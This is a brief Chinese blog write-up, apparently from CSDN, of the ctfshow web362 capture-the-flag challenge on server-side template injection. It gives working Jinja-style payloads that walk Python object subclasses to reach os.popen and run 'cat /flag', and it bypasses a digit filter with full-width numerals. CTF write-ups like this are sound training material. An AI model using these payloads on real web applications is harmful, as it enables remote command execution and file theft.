当前位置:网站首页>ctfshow-web362(SSTI)

ctfshow-web362(SSTI)

2022-04-23 18:29:00 m0_62094846

?name={
   {"".__class__.__bases__[0].__subclasses__()}}

 一直到这一步都是正常的

  从12开始就没用了

数字出现了问题,看wp用全角数字代替正常数字绕过

?name={
   {"".__class__.__bases__[0].__subclasses__()[132]}}

 然后应该可以用正常方法做了

?name={
   {"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_62094846/article/details/124361669